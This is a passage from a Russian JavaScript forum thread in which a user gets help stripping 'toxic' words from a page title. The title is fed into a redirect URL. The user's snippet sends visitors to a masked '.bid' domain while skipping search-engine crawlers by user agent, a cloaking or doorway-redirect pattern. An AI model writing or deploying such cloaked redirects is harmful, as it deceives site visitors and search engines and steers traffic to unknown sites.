Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #11 (permalink)  
Старый 18.06.2018, 14:14
Интересующийся
Отправить личное сообщение для affaff Посмотреть профиль Найти все сообщения от affaff
 
Регистрация: 10.11.2014
Сообщений: 18

var element = document.getElementsByTagName("title")[0];
var re_url = 'http://***.bid/?key='+element.innerHTML;
document.title = document.title.replace(/toxic keyword/gi, "");

Так ничего не получилось
Ответить с цитированием
  #12 (permalink)  
Старый 18.06.2018, 14:16
Интересующийся
Отправить личное сообщение для affaff Посмотреть профиль Найти все сообщения от affaff
 
Регистрация: 10.11.2014
Сообщений: 18

напишите код который можно будет дописать помимо этого
чтобы из тайтла в подстановке в ссылку удалялись токсичные слова

var element = document.getElementsByTagName("title")[0];
var re_url = 'http://***.bid/?key='+element.innerHTML;


if (document.referrer || !/google||baidu|bing|msn|duckduckgo|teoma|slurp|yand ex|qwant/i.test(navigator.userAgent)) {
if (detect_by_action) {
botDetect.onUser(function () {
window.location.href = re_url;
});
} else {
window.location.href = re_url;
}
}
Ответить с цитированием
  #13 (permalink)  
Старый 18.06.2018, 14:17
Аватар для j0hnik
Профессор
Отправить личное сообщение для j0hnik Посмотреть профиль Найти все сообщения от j0hnik
 
Регистрация: 01.12.2016
Сообщений: 3,650

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>keyword Document toxic</title>
	<script>
document.title = document.title.replace(/toxic|keyword|/gi, "");
</script>
</head>
<body>
</body>
</html>


посмотрите что в тайтл останется
Ответить с цитированием
  #14 (permalink)  
Старый 18.06.2018, 14:22
Аватар для j0hnik
Профессор
Отправить личное сообщение для j0hnik Посмотреть профиль Найти все сообщения от j0hnik
 
Регистрация: 01.12.2016
Сообщений: 3,650

попробуйте рассказать подробно что вы сделать хотите?
при чем тут document.referrer и navigator.userAgent
Ответить с цитированием
  #15 (permalink)  
Старый 18.06.2018, 14:29
Интересующийся
Отправить личное сообщение для affaff Посмотреть профиль Найти все сообщения от affaff
 
Регистрация: 10.11.2014
Сообщений: 18

var element = document.getElementsByTagName("title")[0];
var re_url = 'http://***.bid/?key='+element.innerHTML;

значение re_url это у нас конечная ссылка на которую юзер уходит при исполнении некоторых условий. Это не нужно. это все работает

Нам нужно что бы в это значение подставлялась фраза из тайтла без "плохих слов", я уже раз пятый это объясняю)
Ответить с цитированием
  #16 (permalink)  
Старый 18.06.2018, 14:32
Аватар для j0hnik
Профессор
Отправить личное сообщение для j0hnik Посмотреть профиль Найти все сообщения от j0hnik
 
Регистрация: 01.12.2016
Сообщений: 3,650

var re_url = 'http://***.bid/?key='+document.title.replace(/toxic|keyword|/gi, "");


вот собственно
Ответить с цитированием
  #17 (permalink)  
Старый 18.06.2018, 14:43
Интересующийся
Отправить личное сообщение для affaff Посмотреть профиль Найти все сообщения от affaff
 
Регистрация: 10.11.2014
Сообщений: 18

Спасибо) Мощь!
это еще проще. и все работает как нужно
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как с помощью скрипта высчитать ширину полосы прокрутки? LADYX Элементы интерфейса 35 13.11.2017 12:50
Преобразование текста в число. Valentin1918 Общие вопросы Javascript 21 12.01.2015 19:05
Как запретить отмену выделения текста от клика мышью? Маэстро Internet Explorer 0 03.04.2012 21:21
Чудеса математики js при padding borovik Элементы интерфейса 6 09.07.2011 22:02
Получение позиции текста по координатам traa Events/DOM/Window 20 08.02.2011 14:19